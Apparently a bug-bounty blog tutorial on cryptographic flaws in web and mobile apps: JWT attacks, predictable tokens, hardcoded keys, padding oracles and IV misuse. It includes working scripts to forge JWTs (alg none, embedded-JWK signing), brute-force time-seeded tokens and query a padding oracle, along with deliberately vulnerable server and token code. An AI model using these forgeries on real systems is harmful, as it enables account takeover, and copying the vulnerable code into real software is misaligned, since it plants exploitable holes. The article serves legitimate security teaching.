In this final installment of the Hacking Cryptography series, we’ll explore cryptographic vulnerabilities in web and mobile applications. Learning to hack crypto in this context is particularly valuable to bug bounty hunters, as cryptography has been vital to the widespread adoption of the internet. For example, even the most basic web-based shopping applications would not be possible without cryptography to protect credit card numbers in transit, securely store user credentials as hashes server side, and provide session-based user interactions via tokens/identifiers.

While there are countless ways in which cryptographic flaws can undermine the security of web and mobile apps, we’ll focus on some of the most common and impactful examples:

  • JSON Web Token (JWT) vulnerabilities
  • Predictable token/key generation
  • Hardcoded keys and key reuse
  • Padding oracle vulnerabilities
  • Improper use of initialization vectors (IVs)

JWT vulnerabilities

Understanding the risk

The use of JWTs for authentication in web and mobile applications has exploded in recent years, largely due to their integration with OAuth 2.0 and OpenID Connect. These tokens provide a compact, URL-safe, and standardized way for applications to validate user identity and authorization claims without relying on server-side session storage—a model often referred to as stateless authentication.

For more information about JWTs, see https://datatracker.ietf.org/doc/html/rfc7519.

Maximizing impact for bug bounty

To maximize the impact of JWT vulnerabilities for bug bounty, it’s important to understand how modern stateless authentication with JWTs differs from traditional stateful session-based models. Historically, authentication relied on opaque session identifiers—random tokens issued after login, stored server side, and validated against a session table. The primary security concern was ensuring such tokens were sufficiently unpredictable.

In contrast, the security of JWTs hinges on cryptographically sound verification of the JWT signature and validation of JWT-embedded claims. Because the server does not store session state data, any weaknesses in signature handling or claim enforcement can allow an attacker to forge valid-looking tokens. From the bug bounty hunter’s perspective, this creates many interesting opportunities, ranging from user impersonation and privilege escalation to the injection of malicious inputs/payloads.

Lack of session invalidation

One common vulnerability with JWT-based authentication is the failure to fully invalidate user sessions on logout or password change/reset, which stems from the stateless authentication model. While a purely server-side failure to invalidate the session is a P5 (informational) finding, the severity increases to P4 (low) if any user session state data remains on the client side. This often manifests as an exploitable vulnerability when apps use separate hostnames for frontend and API traffic, with tokens being cleared on the client side for one host/domain (e.g., app.example.com) but not the other (e.g., api.example.com). Be sure to carefully test logout flows across all subdomains and storage contexts to catch these inconsistencies. When testing for these vulnerabilities in mobile apps, it can be fruitful to check all SQLite databases in the app’s folder, which often contain the contents of LocalStorage for WebView (Android) and WKWebView (iOS) components.

Lack of signature validation

In some cases, the server will issue signed JWTs but fail to validate the signature for JWTs accompanying user requests. When this happens, an attacker can make arbitrary changes to the JWT contents, such as changing the user ID, username, scope, and authorization grants. As you can imagine, the impact of such a vulnerability can be quite severe, as it can facilitate everything from privilege escalation to account takeover.

None algorithm attack

Similar to the lack of signature validation vulnerability, the none algorithm attack takes advantage of inadequate server-side signature validation. Specifically, this attack abuses a legitimate feature of the JWT specification referred to as “unsecured JWTs” (see https://datatracker.ietf.org/doc/html/rfc7519#section-6). In this attack, we change the JWT alg parameter to none and then remove the signature portion of the JWT altogether. Consider the signed JWT below:

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJidWdjcm93ZCIsImlhdCI6bnVsbCwiZXhwIjoxNzkzNDkxMTk5LCJhdWQiOiJidWdjcm93ZC5jb20iLCJzdWIiOiJleGFtcGxlQGJ1Z2Nyb3dkLmNvbSIsIkdpdmVuTmFtZSI6IkpvaG4iLCJTdXJuYW1lIjoiRG9lIiwiRW1haWwiOiJleGFtcGxlQGJ1Z2Nyb3dkLmNvbSIsIlJvbGUiOiJBZG1pbiJ9.9SkMh2-9wmnT09sbOZD583FQK5_vWdpP-Uzhqc5YWuM

Decoded:

{"typ": "JWT","alg": "HS256"}
.
{"iss": "bugcrowd","iat": null,"exp": 1793491199,"aud": "bugcrowd.com","sub": "example@bugcrowd.com","GivenName": "John","Surname": "Doe","Email": "example@bugcrowd.com","Role": "Admin"}
.
\xF5\x29\x0C\x87\x6F\xFD\xC2\x69\xD3\xD3\xDB\x1B\x39\x90\xF9\xF3\x71\x50\x2B\x9F\xAF\x59\xDA\x4F\xFD\x4C\xE1\xA9\xCE\x58

When changed as follows, signature validation can be bypassed on the server side:

eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJpc3MiOiJidWdjcm93ZCIsImlhdCI6bnVsbCwiZXhwIjoxNzkzNDkxMTk5LCJhdWQiOiJidWdjcm93ZC5jb20iLCJzdWIiOiJleGFtcGxlQGJ1Z2Nyb3dkLmNvbSIsIkdpdmVuTmFtZSI6IkpvaG4iLCJTdXJuYW1lIjoiRG9lIiwiRW1haWwiOiJleGFtcGxlQGJ1Z2Nyb3dkLmNvbSIsIlJvbGUiOiJBZG1pbiJ9.

Decoded:

{"typ": "JWT","alg": "none"}
.
{"iss": "bugcrowd","iat": null,"exp": 1793491199,"aud": "bugcrowd.com","sub": "example@bugcrowd.com","GivenName": "John","Surname": "Doe","Email": "example@bugcrowd.com","Role": "Admin"}
.

This feature is intended to support use cases that rely on other mechanisms to secure the JWT payload, but when the feature is enabled in the typical authentication use case, it can allow an attacker to make arbitrary changes to the JWT contents.

NOTE: JWTs make use of the “base64 encoding with URL-safe alphabet,” as defined in RFC 4648 § 5 (see https://datatracker.ietf.org/doc/html/rfc4648#section-5). Often referred to as base64url, this encoding scheme “omits the padding and replaces + and / with - and _” (see URL and filename safe Base64).
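
To see what this looks like in practice, here is a minimal Python sketch (standard library only) that downgrades an existing signed JWT to an unsecured alg none token; extensions like Burp Suite’s JWT Editor automate the same manipulation:

import base64
import json

def b64url_decode(segment: str) -> bytes:
    # base64url omits padding; restore it before decoding
    return base64.urlsafe_b64decode(segment + '=' * (-len(segment) % 4))

def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b'=').decode()

def to_unsecured_jwt(token: str) -> str:
    header_b64, payload_b64, _signature = token.split('.')
    header = json.loads(b64url_decode(header_b64))
    header['alg'] = 'none'  # downgrade to an unsecured JWT
    # The payload could also be tampered with here (e.g., elevating Role to Admin)
    return f"{b64url_encode(json.dumps(header).encode())}.{payload_b64}."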

Real-world example: CVE-2018-0114, Cisco JWT signature bypass

In 2018, the Cisco node-jose open-source library was found to allow an attacker to re-sign JWTs by embedding a public key in the JWT header and then signing the JWT using the corresponding (attacker-controlled) private key. This allowed the attacker to forge arbitrary JWTs, which the server-side components subsequently validated using the attacker-controlled public/private keypair.

This vulnerability is an excellent example of how the insecure implementation of otherwise secure cryptographic algorithms can lead to highly impactful weaknesses. Per RFC 7517, the JSON Web Key (JWK) standard specifies how identity providers can publish the public keys corresponding to the private keys used for signing JWTs, which enables clients to validate the authenticity of server-provided signed JWTs. Typically, we see identity providers publish such keys via the /.well-known/jwks.json endpoint. As bug bounty hunters, we can use this endpoint to glean valuable information about the server-side JWT implementation, such as a listing of supported signature algorithms.
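
To illustrate the attack pattern behind CVE-2018-0114, here’s a rough sketch assuming the PyJWT and cryptography packages: it generates an attacker-controlled RSA keypair, embeds the public key in the JWT header as a jwk parameter, and signs the token with the matching private key. A vulnerable verifier trusts the embedded key and accepts the forgery. The claims shown are hypothetical.

import base64
import jwt  # PyJWT
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import rsa

def b64url_uint(n: int) -> str:
    raw = n.to_bytes((n.bit_length() + 7) // 8, 'big')
    return base64.urlsafe_b64encode(raw).rstrip(b'=').decode()

# Attacker-controlled keypair
key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
pub = key.public_key().public_numbers()

pem = key.private_bytes(
    serialization.Encoding.PEM,
    serialization.PrivateFormat.PKCS8,
    serialization.NoEncryption(),
)

# Embed the public key in the header as a JWK; vulnerable verifiers will use it
forged = jwt.encode(
    {'sub': 'victim@example.com', 'Role': 'Admin'},  # hypothetical claims
    pem,
    algorithm='RS256',
    headers={'jwk': {'kty': 'RSA', 'e': b64url_uint(pub.e), 'n': b64url_uint(pub.n)}},
)
print(forged)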

For a hands-on demonstration of this vulnerability, check out the PentesterLab exercise here: https://pentesterlab.com/exercises/cve-2018-0114.

Predictable token/key generation

Understanding the risk

Tokens used for password resets, session identifiers, and key generation must be unpredictable. If developers use weak pseudo-random number generators (PRNGs), timestamp-based logic, or reuse keys across environments, attackers can predict tokens or replay values from one environment in another. Such vulnerabilities allow attackers to hijack sessions, reset passwords, and even bypass multifactor authentication (MFA), such as one-time passwords (OTPs). It is critical that developers make use of only cryptographically secure pseudo-random number generators (CSPRNGs) when relying on “randomness” for security in any way.

An ever-increasing number of applications and systems have started using SMS-based OTPs as a second authentication factor for sensitive operations, such as password reset flows and identity verification. Such ubiquitous use of SMS OTPs makes them an excellent attack vector that presents substantial risk if compromised. With this in mind, let’s explore how we can leverage this as bug bounty hunters.

Maximizing impact for bug bounty

Can you spot the bug in the following 6-digit token generation (i.e., SMS OTP) Python code?

import time
import random

def generate_reset_token():
    seed = int(time.time())
    random.seed(seed)
    token = ''.join([str(random.randint(0, 9)) for _ in range(6)])
    return token

There are a couple of issues in the above code block leading to predictable OTPs:

  1. The seed is initialized with the current date/time as a Unix timestamp, a value an attacker can often guess to within a few seconds.
  2. The random.randint() method is not cryptographically secure: Python’s random module is a Mersenne Twister PRNG, which produces fully predictable outputs for a known seed.

In other words, if we know seed, then we know the output of random.randint(). Want to test this out for yourself? Here’s a Linux/Mac OS one-liner that sets seed to a static value:

python3 -c "import random; random.seed(5); print(''.join(str(random.randint(0, 9)) for _ in range(6)))"

Run this several times and observe that the output is identical on every run: the same seed always yields the same “random” token.
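
The fix is straightforward: use a CSPRNG. In Python, for example, the standard library’s secrets module is designed for exactly this purpose (a minimal sketch):

import secrets

def generate_reset_token() -> str:
    # secrets draws from the OS CSPRNG; outputs are not predictable
    # from the current time or from previously observed tokens
    return ''.join(secrets.choice('0123456789') for _ in range(6))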

So, where are we most likely to find such bugs? Everywhere! In everything from SMS OTPs to web application session IDs and TLS session setup, the use of CSPRNGs is the cornerstone of security. As a general rule, we’re most likely to find such vulnerabilities in homegrown/in-house applications, obscure open-source libraries, embedded systems/IoT, and nonstandard systems/environments. While it does happen from time to time, we’re generally less likely to find such vulnerabilities in the well-hardened application flows exposed by cloud service providers or well-supported open-source projects.

When targeting web applications, token generation often seems like a black box, which can be intimidating. The key to identifying predictable token generation vulnerabilities is looking beyond whether a token appears to be random. The better question to ask is, How was the token generated? For example, these hashes appear pretty random, right?

29f3cbff3bbc47f981aa3862f9a5cf13ffe26d5698cf4a2b49594bea29b0ea8a
be5e2cae825f710675216ebb51caabe0a6fbb065184bc064c039126edb1b33f9
cbfdc82b236cc3bcec0ec6f203f866f71e7f69a171cffd65505d4b4abc01e539
cbfdc82b236cc3bcec0ec6f203f866f71e7f69a171cffd65505d4b4abc01e539
33ddbbf32e4f8b678d307f0b60dc7cd192fb1f474129d056c318fa9239e6c8e4
7d264d881564bc19eb15f71525f108b6829b3b0f5829af655fa434a49dcb293e
0c53d080f552531365cdddb6d6867d89047036b7c875f2330b14d1f89fc3d093
becee1ad9b4ec602df2d55188c11825a0124d3745c1fee4c37d83f7278f5c68e

Well, yes and no. Do they appear random? Yes. Are they random? No. These hashes were generated using the same insecure token generation code as the previous example (notice that two of the hashes are identical: two tokens requested within the same second share a seed and therefore collide):

import time
import random
import hashlib

def generate_reset_token():
    seed = int(time.time())
    random.seed(seed)
    token = ''.join([str(random.randint(0, 9)) for _ in range(6)])
    return hashlib.sha256(token.encode()).hexdigest()

I would suggest developing a library of scripts that implement common bug patterns, such as the one above, that you can quickly adapt to specific use cases on a target-by-target basis. Here’s an example workflow to test for predictable token generation in a web application (a sketch of steps 3 and 4 follows the list):

  1. Use the Burp Suite “Sequencer” tool to capture and export many instances of a given token.
  2. Glean what you can about the token generation algorithm (e.g., likely hash type based on length and context clues).
  3. Generate a list of guessed tokens using the bug pattern code block with predictable inputs (e.g., web request timestamp in unix epoch format, incrementing values).
  4. Look for any instances of guessed tokens (Step 3) in the list of exported tokens (Step 1).
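
Here’s a rough sketch of steps 3 and 4, under the assumption that the target uses the vulnerable SHA-256 generator shown above; the exported_tokens.txt filename is a hypothetical Sequencer export with one token per line:

import hashlib
import random
import time

def guess_tokens(capture_time: int, window: int = 300):
    # Reimplement the suspected generator for every second around the capture time
    for ts in range(capture_time - window, capture_time + window + 1):
        random.seed(ts)
        token = ''.join(str(random.randint(0, 9)) for _ in range(6))
        yield hashlib.sha256(token.encode()).hexdigest()

with open('exported_tokens.txt') as f:  # hypothetical Burp Sequencer export
    observed = {line.strip() for line in f}

matches = observed & set(guess_tokens(int(time.time())))
print(f'{len(matches)} token(s) match the predictable generator')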

When testing mobile applications, we have the benefit of decompilation and disassembly, so we can actually just review the application’s token generation routines ourselves. When reverse engineering Android applications, we can typically unpack the APK and search the decompiled Java code using tools like JADX. When working with iOS apps, we’ll typically be working with assembly-level disassembly using tools like Ghidra or IDA Pro. The key in both cases is to search for instances of common crypto-related class imports and method calls, such as java.util.Random, java.security.SecureRandom, rand(), and NSDate.

Real-world example

Any time a web or mobile application generates an opaque token or a key for use in cryptographic operations, it’s crucial to select a sufficiently random source of entropy. Over the years, there have been many examples of how predictable token/key generation can undermine the entire security posture of an application or system. In 2021, an open-source web-based time-tracking application called “Anuko Time Tracker” was found to generate predictable password reset codes, which could be exploited to take over other users’ accounts. In this particular case, the application simply used an MD5 hash of the current system time as users’ password reset tokens. For more information about this vulnerability, see https://nvd.nist.gov/vuln/detail/CVE-2021-21352.

Hardcoded keys and key reuse

Understanding the risk

Keys should be treated like passwords—secret, ephemeral, and never embedded in code. Yet many apps hardcode AES keys, JWT secrets, or API tokens into mobile binaries, frontend JavaScript bundles, or exposed .env files. Attackers can reverse engineer these apps to extract secrets and impersonate users or call privileged APIs.

Maximizing impact for bug bounty

To maximize the impact of hardcoded keys and key reuse vulnerabilities, it’s essential to understand the underlying cryptographic assumptions these systems are built on. Cryptography is only as strong as its weakest key. When secret keys are hardcoded into applications, shared across systems, or extracted by reverse engineering, the foundational guarantees of encryption, message integrity, and authentication break down completely.

Moving beyond “informational” severity

While the use of hardcoded keys can often lead to highly impactful bugs, the mere presence of hardcoded credentials is not guaranteed to be anything more than a P5 (informational) issue. To maximize impact, we must demonstrate the following:

  1. The key is active and valid (i.e., not expired).
  2. The key is used by the target application for some sensitive operation(s).
  3. The key is, in fact, not intended to be shared publicly (unlike, say, Google Maps API keys, which are designed to be embedded in client code).

For example, if you can show that a hardcoded key in a mobile app or firmware image is used to encrypt API authentication tokens or sign privileged data, the vulnerability becomes not just a misconfiguration but an avenue for full authentication bypass, impersonation, and/or privilege escalation.

Exploitation vectors for bug bounty hackers

Hardcoded or embedded keys can be discovered in a variety of contexts:

  • Mobile apps—Decompile APK/IPA files and search for SecretKeySpec, Mac.getInstance, KeyGenerator, or string constants used with cryptographic APIs.
  • IoT and embedded devices—Extract firmware from update packages or file systems (via UART, SPI flash, or OTA ZIPs), then search for PEM-encoded keys or fixed symmetric keys in /certs/, /etc/ssl/, or source binaries.
  • JavaScript-heavy frontends—Although rare, web developers sometimes inadvertently hardcode static keys into frontend logic used for JWT signing, request verification, or local data protection.
  • Shared libraries and SDKs—Third-party SDKs reused across multiple apps often include static secrets for analytics, licensing, or SSO. If the same key appears across apps or customers, you may have a platform-wide security issue.

In any of these cases, demonstrating the real-world use of the key greatly increases impact, especially if it’s used for signature verification, decryption, or authentication.
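
As a starting point, here’s a small example of what that search might look like against a decompiled Android app; the patterns and the decompiled_apk/ path are illustrative assumptions, not a definitive toolchain:

import os
import re

# Illustrative patterns: common crypto APIs and key material worth flagging
PATTERNS = [
    re.compile(r'SecretKeySpec\s*\('),                       # hardcoded symmetric keys
    re.compile(r'Mac\.getInstance\s*\('),                    # HMAC usage
    re.compile(r'-----BEGIN (RSA |EC )?PRIVATE KEY-----'),   # embedded PEM keys
    re.compile(r'[A-Fa-f0-9]{32,64}'),                       # hex blobs sized like AES keys
]

def scan(root: str):
    # Walk decompiled sources (e.g., JADX output) and print suspicious lines
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, errors='ignore') as f:
                    for lineno, line in enumerate(f, 1):
                        if any(p.search(line) for p in PATTERNS):
                            print(f'{path}:{lineno}: {line.strip()[:120]}')
            except OSError:
                continue

scan('decompiled_apk/')  # hypothetical path to JADX output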

Signature forgery and widespread reuse

One of the highest-impact bug bounty scenarios is discovering that the same hardcoded symmetric key is used across all customers of a multi-tenant platform to sign JWTs or cookies. In this case, an attacker who extracts the key from their own app instance (or from a reverse-engineered device) can forge tokens to impersonate any user across the entire system. Even worse, if the key is used for the encryption of session tokens, password reset links, or PII, then the attacker may be able to decrypt or manipulate data for other users or tenants. Whenever hardcoded key reuse can be tied to cryptographic message forgery, the decryption of sensitive data, or privilege escalation, we’re likely to demonstrate significant security impact.

Another example of key reuse is when developers reuse the same key between DEV/QA environments and production environments. This vulnerability is relatively easy to test for and can lead to serious impact, depending on the operations the key is used to protect. When present, this vulnerability allows an attacker with DEV/QA credentials to impersonate other users in the production environment. To test for this bug, perform the following steps (a minimal replay sketch follows the list):

  1. Authenticate to the DEV/QA environment.
  2. Intercept and copy any sensitive tokens issued for the DEV/QA environment (e.g., session tokens).
  3. Authenticate to the PROD environment.
  4. Perform sensitive operations within the PROD environment and intercept the HTTP sessions.
  5. Replay the sensitive operations, replacing PROD-issued tokens with DEV/QA-issued tokens, one by one.
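
Step 5 can be as simple as swapping an Authorization header. Here’s a minimal illustration using Python’s requests library; the endpoint, header name, and token are hypothetical placeholders for whatever your target actually uses:

import requests

QA_TOKEN = 'eyJ...'  # hypothetical session token issued by the DEV/QA environment
PROD_URL = 'https://api.example.com/v1/me'  # hypothetical sensitive PROD endpoint

# Replay a PROD request with the QA-issued token; a 200 response with account
# data suggests the signing/encryption key is shared across environments
resp = requests.get(PROD_URL, headers={'Authorization': f'Bearer {QA_TOKEN}'})
print(resp.status_code, resp.text[:200])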

Real-world examples

There are many examples of both web and mobile applications using hardcoded and/or reused cryptographic keys, leading to vulnerabilities that range in impact from low/informational to absolutely critical. In fact, a recent analysis performed by the team at security.com highlighted numerous instances of hardcoded keys in mobile apps, some with millions of downloads. It is quite common to find innocuous third-party API keys in mobile app bundles (e.g., Google Maps API keys or marketing analytics API keys), which do not present any security risks in and of themselves. However, as this research highlights, there are many instances in which highly sensitive API keys are hardcoded into popular mobile apps, potentially exposing the personal information of millions of users.

Padding oracle vulnerabilities

Understanding the risk

When using AES-CBC encryption, data is padded before encryption and unpadded after decryption. If an application leaks errors (e.g., padding errors vs. MAC errors), attackers can modify ciphertext and observe responses to decrypt data byte by byte. This vulnerability allows plaintext recovery without the key and, in some cases, ciphertext forgery.

Maximizing impact for bug bounty

At first glance, padding errors in encrypted data might seem like a low-severity issue, but in practice, they can be devastating. Padding oracle vulnerabilities allow an attacker to decrypt, and sometimes encrypt, arbitrary ciphertexts without knowing the cryptographic key. This effectively breaks the confidentiality guarantees of symmetric encryption schemes like AES-CBC. With persistence and a solid proof of concept, this class of vulnerability can yield high-value findings.

To recognize and exploit a padding oracle, we need to understand what’s happening behind the scenes. Block ciphers (e.g., AES) operate on fixed-size blocks (16 bytes for AES), so plaintext inputs must be padded to align with blocks of that size. Common padding schemes, like PKCS#7, append bytes indicating the number of padding bytes added (e.g., \x03\x03\x03 for 3 bytes of padding). If a server decrypts a ciphertext and encounters invalid padding, it will usually raise an error. If the app exposes different error messages (or even just different timing behavior), it exposes a powerful side channel, which we can use to glean detailed information about the underlying cryptographic operation(s).

To demonstrate this vulnerability, we’ll use an intentionally vulnerable web application that returns verbose errors if the ciphertext is malformed. The web application expects a base64-encoded ciphertext and returns descriptive errors that allow us to glean valuable information about the decryption process.

from flask import Flask, request, jsonify
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
from Crypto.Random import get_random_bytes
import base64

app = Flask(__name__)

# AES block size
BLOCK_SIZE = AES.block_size

# Static key (attacker doesn't know this)
KEY = get_random_bytes(16)

@app.route('/encrypt', methods=['GET'])
def encrypt():
    plaintext = b'This is a secret message.'
    iv = get_random_bytes(BLOCK_SIZE)
    cipher = AES.new(KEY, AES.MODE_CBC, iv)
    ciphertext = cipher.encrypt(pad(plaintext, BLOCK_SIZE))
    full_ciphertext = iv + ciphertext
    encoded = base64.b64encode(full_ciphertext).decode()
    return jsonify({'ciphertext': encoded})

@app.route('/decrypt', methods=['POST', 'GET'])
def decrypt():
    try:
        param_data = request.args.get('data')
        if not param_data:
            param_data = request.form.get('data')
        if not param_data:
            raw_body = request.get_data()
            if raw_body:
                param_data = raw_body.strip()
        if not param_data:
            return jsonify({'status': 'error', 'message': 'No data provided'}), 400
        if isinstance(param_data, bytes):
            param_data = param_data.decode()
        raw = base64.b64decode(param_data)
        iv = raw[:BLOCK_SIZE]
        ct = raw[BLOCK_SIZE:]
        cipher = AES.new(KEY, AES.MODE_CBC, iv)
        pt = unpad(cipher.decrypt(ct), BLOCK_SIZE)
        return jsonify({'status': 'success', 'plaintext': pt.decode()})
    except ValueError as e:
        if 'Padding is incorrect' in str(e):
            return jsonify({'status': 'error', 'message': 'Invalid padding'}), 403
        else:
            return jsonify({'status': 'error', 'message': 'Decryption error'}), 400
    except Exception as e:
        return jsonify({'status': 'error', 'message': 'Unexpected error'}), 500

if __name__ == '__main__':
    app.run(debug=True, port=5555)

If we run the above Python3 script and then visit http://localhost:5555/encrypt, we’re presented with an encrypted and base64-encoded string in the JSON response.

We’ll copy that string, URL encode any special characters (e.g., /, +), and then visit http://localhost:5555/decrypt?data=_BASE64_STRING_. If we provide a valid encrypted string, it’s successfully decrypted and the plaintext is displayed in the response.

If we provide a string that includes correct padding—but is nevertheless not a valid encrypted string—the web server response indicates “Decryption error.”

However, if we provide a string that includes incorrect padding, the web server response indicates “Invalid padding.”

This difference in the web server’s response based on whether the submitted ciphertext includes valid padding acts as a side channel, which, in turn, can be used to decrypt the ciphertext byte by byte (without ever knowing the key) by sending many specially crafted requests. While this example uses obvious differences in the error message displayed, even subtle differences in web server responses (e.g., timing) can act as a padding oracle.

Challenge yourself: Create a client-side script that exploits this padding oracle bug.
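
As a starting point for that challenge, here’s a minimal oracle-query helper targeting the demo app above; a full exploit would call it from the classic CBC byte-flipping loop, working backward through each ciphertext block:

import base64
import requests

ORACLE_URL = 'http://localhost:5555/decrypt'

def has_valid_padding(raw: bytes) -> bool:
    # The demo app returns HTTP 403 only when PKCS#7 padding is invalid
    data = base64.b64encode(raw).decode()
    resp = requests.get(ORACLE_URL, params={'data': data})
    return resp.status_code != 403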

Real-world examples

There are many examples of padding oracle attacks that have exposed large portions of the internet to potential compromise. Some notable examples include a 2010 vulnerability in ASP.NET View State (CVE‑2010‑3332) and the SSL 3.0 POODLE vulnerability (CVE-2014-3566). As demonstrated by a 2025 vulnerability in the Oberon PSA Crypto library, padding oracle vulnerabilities are still alive and well in the modern era. In this latest example, which is tracked as CVE-2025-7071, timing differences between the library’s handling of the “padding error” and “no padding error” conditions allowed an attacker to recover decrypted plaintext on a byte-by-byte basis.

Improper use of IVs

Understanding the risk

In block cipher modes like CBC or CTR, IVs (or nonces) must be unique per message, and in CBC mode, unpredictable as well. Using a static, predictable, or null IV compromises security because two identical plaintexts (or plaintext prefixes) produce identical ciphertexts, allowing attackers to infer relationships between messages or recover data. Since IVs are often used to establish secure communication protocols, vulnerabilities leading to predictable or guessable IVs can carry significant risk to the confidentiality and integrity of both data and communications.

Maximizing impact for bug bounty

In many instances, these vulnerabilities are really just a subtype of the “predictable token generation” vulnerability. Here are some other notable bug patterns involving improper IV use (a short demonstration follows the list):

  • IV reuse: A web or mobile application reuses an IV across multiple contexts, such as between different sessions and/or users.
  • Static IV: A web or mobile application uses the same IV for all instances of a given operation.
  • Null IV: A web or mobile application uses all zeros (e.g., 0x00000000) as the IV.
  • No IV in GCM or CBC: Some APIs and SDKs make IVs optional arguments for cryptography-related methods, falling back to a null IV or previous memory contents.

The exploitation of such vulnerabilities demands a deep understanding of the target’s cryptographic environment, which is much easier to build when we have runtime insight into a live system. For web applications, this is best achieved by setting up a test environment that we use to develop a proof of concept. For mobile applications, application disassembly and a rooted device give us all the insight we need.

Wrapping up the crypto series

This final installment of the Hacking Cryptography series has highlighted that despite the complexity of modern ciphers, the most critical weaknesses often lie in their implementation within web and mobile applications. For bug bounty hunters, the key takeaway is to look beyond the cryptographic primitive itself and focus on practical deployment: key management (hardcoded keys and key reuse), entropy sources, and how server responses may unintentionally leak critical information. By adopting a “show real-world impact” mindset and understanding how these implementation flaws break confidentiality and integrity guarantees, hackers can consistently find and maximize the impact of cryptographic bugs.

Thank you for following the crypto series. To start from the beginning, check out my first piece: Hacking crypto part I.